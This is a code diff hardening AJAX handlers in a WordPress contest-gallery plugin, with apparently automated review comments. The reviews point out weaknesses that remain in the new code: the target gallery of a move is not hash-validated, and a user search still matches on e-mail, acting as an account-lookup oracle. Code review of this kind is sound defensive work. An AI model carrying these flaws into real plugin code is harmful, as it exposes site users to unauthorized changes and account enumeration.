-		$allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryIDArray = [];
+        $galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryIDArray = [];
         foreach ($allCategoriesByGalleryID as $row){
             if(!isset($allCategoriesByGalleryIDArray[$row->GalleryID])){
-	            $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
+                $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
             }
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
         }

-		?>
-    <script data-cg-processing="true">
-        cgJsClassAdmin.gallery.vars.allCategoriesByGalleryID = <?php echo json_encode($allCategoriesByGalleryIDArray);?>;
-        cgJsClassAdmin.gallery.vars.galleryIDs = <?php echo json_encode($galleryIDs);?>;// renew here for sure
-        cgJsClassAdmin.gallery.vars.contact_forms_by_gallery_id = <?php echo json_encode($contact_forms_by_gallery_id); ?>;
-    </script>
-<?php
+        wp_send_json_success(array(
+            'allCategoriesByGalleryID' => $allCategoriesByGalleryIDArray,
+            'galleryIDs' => $galleryIDs,
+            'contact_forms_by_gallery_id' => $contact_forms_by_gallery_id
+        ));

         }
-}
+	}

 // move to another gallery
 add_action('wp_ajax_post_cg_move_to_another_gallery', 'post_cg_move_to_another_gallery');
 if (!function_exists('post_cg_move_to_another_gallery')) {
 	function post_cg_move_to_another_gallery()
 	{
+		cg_backend_ajax_require_access_json();
 		contest_gal1ery_db_check();

 		$_POST = cg1l_sanitize_post($_POST);

-		$isBackendCall = true;
-		$isAjaxCall = true;
-
-		$isAjaxCategoriesCall = true;
-
-		global $wp_version;
-		$sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+		$cgMoveRealId = (!empty($_POST['cgMoveRealId'])) ? absint($_POST['cgMoveRealId']) : 0;
+		$InGalleryIDtoMove = (!empty($_POST['cg_in_gallery_id_to_move'])) ? absint($_POST['cg_in_gallery_id_to_move']) : 0;
+		$MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+		$cgMoveCategory = (!empty($_POST['cgMoveCategory'])) ? absint($_POST['cgMoveCategory']) : 0;
+		$MoveAssignsRaw = (!empty($_POST['cgMoveAssigns']) && is_array($_POST['cgMoveAssigns'])) ? $_POST['cgMoveAssigns'] : array();
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';

-		$cgVersion = cg_get_version_for_scripts();
+		cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
+		if (empty($cgMoveRealId) || empty($InGalleryIDtoMove) || empty($MoveFromGalleryID)) {
+			cg_backend_ajax_error_json('Missing move request data.', 400, 'cg_missing_move_data');
+		}

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
+		if ($InGalleryIDtoMove == $MoveFromGalleryID) {
+			cg_backend_ajax_error_json('Entry can not be moved to the same gallery.', 400, 'cg_same_gallery_move');
+		}

-				$cgMoveRealId = absint($_POST['cgMoveRealId']);
-				$InGalleryIDtoMove = absint($_POST['cg_in_gallery_id_to_move']);
-				$MoveFromGalleryID = absint($_POST['cgMoveFromGalleryID']);
-				$cgMoveCategory = absint($_POST['cgMoveCategory']);
-				$MoveAssigns = $_POST['cgMoveAssigns'];
+		global $wpdb;
+		$table_posts = $wpdb->prefix . "posts";
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
+		$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
+		$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+		$tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+		$sourceGalleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $MoveFromGalleryID));
+		if (empty($sourceGalleryExists)) {
+			cg_backend_ajax_error_json('Source gallery does not exist.', 400, 'cg_source_gallery_missing');
+		}

-				global $wpdb;
-				$table_posts = $wpdb->prefix . "posts";
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
-				$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
-				$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
-				$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$optionsInGalleryToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_options WHERE id = %d ORDER BY id DESC LIMIT 0, 1", $InGalleryIDtoMove));
+		if (empty($optionsInGalleryToMove)) {
+			cg_backend_ajax_error_json('Target gallery does not exist.', 400, 'cg_target_gallery_missing');
+		}

-				$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		$rowToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $cgMoveRealId, $MoveFromGalleryID));
+		if (empty($rowToMove)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected source gallery.', 400, 'cg_entry_source_mismatch');
+		}

-				$Version = cg_get_version_for_scripts();
+		if (!empty($rowToMove->EcommerceEntry)) {
+			cg_backend_ajax_error_json('E-commerce entries can not be moved to another gallery.', 400, 'cg_ecommerce_entry_move_blocked');
+		}

-				$wpdb->update(
-					"$tablename",
-					array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
-					array('id' => $insert_id),
-					array('%s'),
-					array('%d')
-				);
+		if (!empty($cgMoveCategory)) {
+			$categoryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_categories WHERE id = %d AND GalleryID = %d", $cgMoveCategory, $InGalleryIDtoMove));
+			if (empty($categoryExists)) {
+				cg_backend_ajax_error_json('Selected target category does not belong to the target gallery.', 400, 'cg_target_category_mismatch');
+			}
+		}

-				$row = $wpdb->get_row("SELECT * FROM $tablename WHERE id = $insert_id");
+		$MoveAssigns = array();
+		if (!empty($MoveAssignsRaw)) {
+			$formInputs = $wpdb->get_results($wpdb->prepare("SELECT id, GalleryID, Field_Type FROM $tablename_form_input WHERE GalleryID IN (%d,%d)", $MoveFromGalleryID, $InGalleryIDtoMove));
+			$sourceFields = array();
+			$targetFields = array();
+			foreach ($formInputs as $formInput) {
+				if (absint($formInput->GalleryID) == $MoveFromGalleryID) {
+					$sourceFields[absint($formInput->id)] = $formInput->Field_Type;
+				} elseif (absint($formInput->GalleryID) == $InGalleryIDtoMove) {
+					$targetFields[absint($formInput->id)] = $formInput->Field_Type;
+				}
+			}

-				// Delete previous entry because inserted as new one through cg_copy_table_row
-				$wpdb->query("DELETE FROM $tablename WHERE id = $cgMoveRealId");
+			$allowedMoveFieldTypes = array('date-f', 'text-f', 'url-f', 'email-f', 'comment-f', 'select-f', 'radio-f', 'chk-f');
+			$usedTargetFields = array();
+			foreach ($MoveAssignsRaw as $FromInput => $ToInput) {
+				$FromInput = absint($FromInput);
+				$ToInput = absint($ToInput);

-                // delete WpPages now
-				if(!empty($row->WpPage)){
-					wp_delete_post($row->WpPage,true);
+				if (empty($FromInput) || empty($ToInput)) {
+					cg_backend_ajax_error_json('Invalid field assignment data.', 400, 'cg_invalid_move_assignment');
 				}
-				if(!empty($row->WpPageUser)){
-					wp_delete_post($row->WpPageUser,true);
+				if (empty($sourceFields[$FromInput]) || empty($targetFields[$ToInput])) {
+					cg_backend_ajax_error_json('Field assignment does not belong to the selected galleries.', 400, 'cg_move_assignment_gallery_mismatch');
 				}
-				if(!empty($row->WpPageNoVoting)){
-					wp_delete_post($row->WpPageNoVoting,true);
+				if (!in_array($sourceFields[$FromInput], $allowedMoveFieldTypes, true) || $sourceFields[$FromInput] != $targetFields[$ToInput]) {
+					cg_backend_ajax_error_json('Field assignment types do not match.', 400, 'cg_move_assignment_type_mismatch');
 				}
-				if(!empty($row->WpPageWinner)){
-					wp_delete_post($row->WpPageWinner,true);
-				}
-				if(!empty($row->WpPageEcommerce)){
-					wp_delete_post($row->WpPageEcommerce,true);
+				if (!empty($usedTargetFields[$ToInput])) {
+					cg_backend_ajax_error_json('A target field can only be assigned once.', 400, 'cg_move_assignment_duplicate_target');
 				}

-                // Update parents
-				$optionsInGalleryToMove = $wpdb->get_row("SELECT * FROM $tablename_options WHERE id = $InGalleryIDtoMove ORDER BY id DESC LIMIT 0, 1");
+				$MoveAssigns[$FromInput] = $ToInput;
+				$usedTargetFields[$ToInput] = true;
+			}
+		}

-				if(!empty($optionsInGalleryToMove->WpPageParent)) {
-					$post_title = substr($row->NamePic,0,100);
-					cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
-				}
+		$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		if (empty($insert_id)) {
+			cg_backend_ajax_error_json('Entry could not be copied to the target gallery.', 500, 'cg_move_copy_failed');
+		}

-				if(!empty($cgMoveCategory)){
-					$wpdb->query("UPDATE $tablename SET Category=$cgMoveCategory WHERE id = $insert_id");
-				}else{
-					$wpdb->query("UPDATE $tablename SET Category=0 WHERE id = $insert_id");
-				}
+		$Version = cg_get_version_for_scripts();

-				$wpdb->query("UPDATE $tablename_ip SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_comments SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-				$wpdb->query("UPDATE $tablename_entries SET pid=$insert_id, GalleryID = $InGalleryIDtoMove WHERE pid=$cgMoveRealId");
-
-				$input_ids_entries_to_delete = $wpdb->get_results("SELECT id, f_input_id FROM $tablename_entries WHERE pid  = $insert_id");
-				$input_ids_entries_to_delete_array = [];
-                foreach ($input_ids_entries_to_delete as $entry){
-	                $input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
-                }
+		$updated = $wpdb->update(
+			"$tablename",
+			array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
+			array('id' => $insert_id),
+			array('%s','%d'),
+			array('%d')
+		);
+
+		if ($updated === false) {
+			$wpdb->delete($tablename, array('id' => $insert_id), array('%d'));
+			cg_backend_ajax_error_json('Copied entry could not be assigned to the target gallery.', 500, 'cg_move_assign_gallery_failed');
+		}

-                if(!empty($MoveAssigns)){// have to be checked with not empty
-                    // now change the input ids if were assigned
-	                foreach ($MoveAssigns as $FromInput => $ToInput){
-		                $FromInput = absint($FromInput);
-		                $ToInput = absint($ToInput);
-		                $wpdb->query("UPDATE $tablename_entries SET f_input_id = $ToInput WHERE pid = $insert_id && f_input_id = $FromInput");
-                        if(isset($input_ids_entries_to_delete_array[$FromInput])){
-	                        unset($input_ids_entries_to_delete_array[$FromInput]);
-                        }
-	                }
-                }
+		$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d", $insert_id));
+		if (empty($row)) {
+			cg_backend_ajax_error_json('Moved entry could not be loaded.', 500, 'cg_move_row_missing');
+		}

-				foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
-					$wpdb->query("DELETE FROM $tablename_entries WHERE id = $entryId");
-                }
+		$wpdb->delete($tablename, array('id' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'));

-				$wp_upload_dir = wp_upload_dir();
-                // unlink activated entries if exists
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
-				}
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
-					unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
-				}
-                // move file
-				if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
-                    if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
-	                    mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
-				}
-                // move folder
-				if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
-					if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
-						mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
-                    }
-					rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
-				}
+		// delete WpPages now
+		if(!empty($row->WpPage)){
+			wp_delete_post($row->WpPage,true);
+		}
+		if(!empty($row->WpPageUser)){
+			wp_delete_post($row->WpPageUser,true);
+		}
+		if(!empty($row->WpPageNoVoting)){
+			wp_delete_post($row->WpPageNoVoting,true);
+		}
+		if(!empty($row->WpPageWinner)){
+			wp_delete_post($row->WpPageWinner,true);
+		}
+		if(!empty($row->WpPageEcommerce)){
+			wp_delete_post($row->WpPageEcommerce,true);
+		}

-				cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+		// Update parents
+		if(!empty($optionsInGalleryToMove->WpPageParent)) {
+			$post_title = substr($row->NamePic,0,100);
+			cg_create_wp_pages($InGalleryIDtoMove,$insert_id,$post_title,$optionsInGalleryToMove,$optionsInGalleryToMove->Version);
+		}

-                if($row->Active==1){
-	                $collect = "$tablename.id = ".$row->id;
-	                $GalleryID = $row->GalleryID;
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                                              OR
-                                              (($collect) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($InGalleryIDtoMove,$row);
-                }
+		$wpdb->update($tablename, array('Category' => $cgMoveCategory), array('id' => $insert_id), array('%d'), array('%d'));

-				die;
+		$wpdb->update($tablename_ip, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_comments, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+		$wpdb->update($tablename_entries, array('pid' => $insert_id, 'GalleryID' => $InGalleryIDtoMove), array('pid' => $cgMoveRealId, 'GalleryID' => $MoveFromGalleryID), array('%d','%d'), array('%d','%d'));
+
+		$input_ids_entries_to_delete = $wpdb->get_results($wpdb->prepare("SELECT id, f_input_id FROM $tablename_entries WHERE pid = %d", $insert_id));
+		$input_ids_entries_to_delete_array = [];
+		foreach ($input_ids_entries_to_delete as $entry){
+			$input_ids_entries_to_delete_array[$entry->f_input_id] = $entry->id;
+		}

-			} else {
-				echo "<div id='cgSaveCategoriesCouldNotBeChanged'><h2>MISSINGRIGHTS<br>post_cg_social_platform_input can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		if(!empty($MoveAssigns)){
+			foreach ($MoveAssigns as $FromInput => $ToInput){
+				$wpdb->query($wpdb->prepare("UPDATE $tablename_entries SET f_input_id = %d WHERE pid = %d AND f_input_id = %d", $ToInput, $insert_id, $FromInput));
+				if(isset($input_ids_entries_to_delete_array[$FromInput])){
+					unset($input_ids_entries_to_delete_array[$FromInput]);
+				}
 			}
+		}

-			exit();
-		} else {
-			exit();
+		foreach ($input_ids_entries_to_delete_array as $f_input_id => $entryId) {
+			$wpdb->query($wpdb->prepare("DELETE FROM $tablename_entries WHERE id = %d", $entryId));
+		}
+
+		$wp_upload_dir = wp_upload_dir();
+		// unlink activated entries if exists
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-data/image-data-".$cgMoveRealId.".json");
+		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-stats/image-stats-".$cgMoveRealId.".json");
 		}
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json")){
+			unlink($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-info/image-info-".$cgMoveRealId.".json");
+		}
+		// move file
+		if(file_exists($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json")){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/image-comments-".$cgMoveRealId.".json", $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/image-comments-".$insert_id.".json");
+		}
+		// move folder
+		if(is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId)){
+			if(!is_dir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids")){
+				mkdir($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids",0755,true);
+			}
+			rename($wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$MoveFromGalleryID."/json/image-comments/ids/".$cgMoveRealId, $wp_upload_dir['basedir'] . "/contest-gallery/gallery-id-".$InGalleryIDtoMove."/json/image-comments/ids/".$insert_id);
+		}
+
+		cg_json_upload_form_info_data_files_new($InGalleryIDtoMove,[$insert_id],true);
+
+		if($row->Active==1){
+			$GalleryID = $row->GalleryID;
+			$rowForJson = $wpdb->get_row($wpdb->prepare(
+				"SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' and $table_posts.ID = $tablename.WpUpload)
+				 OR
+				 (($tablename.id = %d) AND $tablename.GalleryID = %d AND $tablename.Active = '1' AND $tablename.WpUpload = 0)
+				 GROUP BY $tablename.id ORDER BY $tablename.id DESC LIMIT 0, 1",
+				$row->id, $GalleryID, $row->id, $GalleryID
+			));
+			if (!empty($rowForJson)) {
+				cg_create_json_files_when_activating($InGalleryIDtoMove,$rowForJson);
+			}
+		}
+
+		wp_send_json_success(array(
+			'entry_id' => $cgMoveRealId,
+			'new_entry_id' => $insert_id,
+			'target_gallery_id' => $InGalleryIDtoMove
+		));
 	}
 }
 // move to another gallery---- END
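Review bot: cg_backend_ajax_validate_gallery_hash_json() in post_cg_move_to_another_gallery binds the request only to $MoveFromGalleryID; the target $InGalleryIDtoMove is merely checked for existence (`SELECT COUNT(*) FROM $tablename_options WHERE id = %d` and the following get_row), so a caller who passes cg_backend_ajax_require_access_json() and holds a valid hash for one gallery can move entries into any gallery that exists. If the hash is meant to scope a user to particular galleries, validate one for the target gallery as well. Secondary: the only compensating action is the `$wpdb->delete($tablename, array('id' => $insert_id), ...)` when the first update returns false; the `Moved entry could not be loaded.` path and every step after `$wpdb->delete($tablename, array('id' => $cgMoveRealId, ...))` (WP page deletion, the three pid updates, the file renames) have no rollback, so a mid-way failure leaves a copied row in the target gallery and orphaned ip/comments/entries rows. Either wrap the database part in a transaction or at least delete $insert_id on the row-missing path.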
@@ -802,15 +921,15 @@

 	            $post_title = substr(cg_pre_process_name_for_url_name($post_title),0,100);

-            $array = [
+	            $array = [
                     'post_title'=> $post_title,
-	            'post_name'=> $post_name,
+                    'post_name'=> $post_name,
                     'guid'=> $guid,
                     'post_type'=>$post_type,
                     'post_content'=>$post_content,
                     'post_mime_type'=>$post_mime_type,
-	            'post_status'=>'publish'
-            ];
+                    'post_status'=>'publish'
+                ];

 	            $postId = wp_insert_post($array);
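Review bot: this hunk only re-indents the $array literal passed to wp_insert_post(); whitespace-only changes mixed into an authorization fix make the security-relevant diff harder to audit, so move them (and the other blank-line-only hunks in this file) into a separate formatting commit.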

@@ -860,7 +979,6 @@
 	    global $wp_version;
 	    $sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';

-
 	    if (defined('DOING_AJAX') && DOING_AJAX) {

 		    $user = wp_get_current_user();
@@ -986,9 +1104,7 @@
 // youtube add to gallery ---- END

 // sort files
-
 add_action('wp_ajax_post_cg_gallery_sort_files', 'post_cg_gallery_sort_files');
-
 if (!function_exists('post_cg_gallery_sort_files')) {
     function post_cg_gallery_sort_files()
     {
@@ -1033,36 +1149,42 @@
 if (!function_exists('post_cg_attach_to_another_user_select')) {
 	function post_cg_attach_to_another_user_select()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
-
-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$wpUsers = $wpdb->base_prefix . "users";
-				$selectWPusers = $wpdb->get_results("SELECT ID, user_login, user_email FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC");
-
-                echo "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
-                    foreach ($selectWPusers as $user){
-                        echo "<option value='$user->ID' data-user_login='$user->user_login' data-user_email='$user->user_email'>$user->user_login - $user->user_email (ID: $user->ID)</option>";
-                    }
-                echo "</select>";
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
-			}
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+		$cgUserSearch = (!empty($_POST['cgUserSearch'])) ? sanitize_text_field($_POST['cgUserSearch']) : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		global $wpdb;
+
+		$wpUsers = $wpdb->base_prefix . "users";
+		if (!empty($cgUserSearch)) {
+			$like = '%' . $wpdb->esc_like($cgUserSearch) . '%';
+			$selectWPusers = $wpdb->get_results($wpdb->prepare("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 AND (user_login LIKE %s OR user_email LIKE %s) ORDER BY user_login ASC LIMIT 20", $like, $like));
+		} else {
+			$selectWPusers = $wpdb->get_results("SELECT ID, user_login FROM $wpUsers WHERE ID > 0 ORDER BY ID ASC LIMIT 20");
+		}

-			exit();
+		$html = "<select id='cgAttachToAnotherUserSelect' name='cgAttachToAnotherUserId' class='cg_no_outline_and_shadow_on_focus'>";
+		if (empty($selectWPusers)) {
+			$html .= "<option value='' disabled selected>No users found</option>";
 		} else {
-			exit();
+			$isFirst = true;
+			foreach ($selectWPusers as $user){
+				$selected = ($isFirst) ? ' selected' : '';
+				$html .= "<option value='" . esc_attr($user->ID) . "' data-user_login='" . esc_attr($user->user_login) . "'" . $selected . ">" . esc_html($user->user_login) . " (ID: " . esc_html($user->ID) . ")</option>";
+				$isFirst = false;
+			}
 		}
+		$html .= "</select>";
+
+		wp_send_json_success(array(
+			'html' => $html,
+			'has_results' => (!empty($selectWPusers))
+		));
 	}
 }
 // attach to another user select --- END
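Review bot: the search branch in post_cg_attach_to_another_user_select still matches `user_email LIKE %s` even though user_email was dropped from the SELECT list and from the rendered <option>; that leaves an oracle which confirms whether a given e-mail substring belongs to an account, which undoes part of the point of removing the address from the output. Match on user_login only, or return the e-mail deliberately for the roles cg_backend_ajax_require_access_json() admits. Minor: $GalleryID defaults to 0 and is handed straight to cg_backend_ajax_validate_gallery_hash_json() with no empty() check, unlike post_cg_attach_to_another_user below, so the behaviour for a missing GalleryID depends entirely on the helper; an explicit 400 here would make the contract visible.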
@@ -1072,52 +1194,78 @@
 if (!function_exists('post_cg_attach_to_another_user')) {
 	function post_cg_attach_to_another_user()
 	{
-		if (defined('DOING_AJAX') && DOING_AJAX) {
+		cg_backend_ajax_require_access_json();
+		$_POST = cg1l_sanitize_post($_POST);

-			$user = wp_get_current_user();
+		global $wpdb;

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
-				global $wpdb;
-
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$table_posts = $wpdb->prefix . "posts";
-				#$wpUsers = $wpdb->prefix . "users";
-
-				$WpUserId = absint($_POST['cgAttachToAnotherUserId']);
-				$pid = absint($_POST['cgEntryId']);
-				$GalleryID = absint($_POST['GalleryID']);
-
-				$wpdb->query("UPDATE $tablename SET WpUserId=$WpUserId WHERE id = $pid");
-
-				$Active = $wpdb->get_var( "SELECT Active FROM $tablename WHERE id = $pid");
-
-                if($Active==1){
-	                $row = $wpdb->get_row( "SELECT DISTINCT $table_posts.*, $tablename.* FROM $table_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $table_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
-                          GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-	                cg_create_json_files_when_activating($GalleryID,$row);
-                }
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$table_posts = $wpdb->prefix . "posts";
+
+		$WpUserId = (isset($_POST['cgAttachToAnotherUserId'])) ? absint($_POST['cgAttachToAnotherUserId']) : 0;
+		$pid = (!empty($_POST['cgEntryId'])) ? absint($_POST['cgEntryId']) : 0;
+		$GalleryID = (!empty($_POST['GalleryID'])) ? absint($_POST['GalleryID']) : 0;
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+
+		cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash);
+
+		if (empty($pid) || empty($GalleryID)) {
+			cg_backend_ajax_error_json('Missing user assignment data.', 400, 'cg_missing_attach_data');
+		}

-				#$wpUser = $wpdb->get_row("SELECT user_login, user_email FROM $wpUsers WHERE ID = $WpUserId");
-				//echo "###".$wpUser->user_login." - ".$wpUser->user_email."###";
-				echo "###post_cg_attach_to_another_user successful###";
-
-			} else {
-				echo "<div ><h2>MISSINGRIGHTS<br>This area can be edited only as administrator, editor or author.</h2></div>";
-				exit();
+		$galleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $GalleryID));
+		if (empty($galleryExists)) {
+			cg_backend_ajax_error_json('Gallery does not exist.', 400, 'cg_attach_gallery_missing');
+		}
+
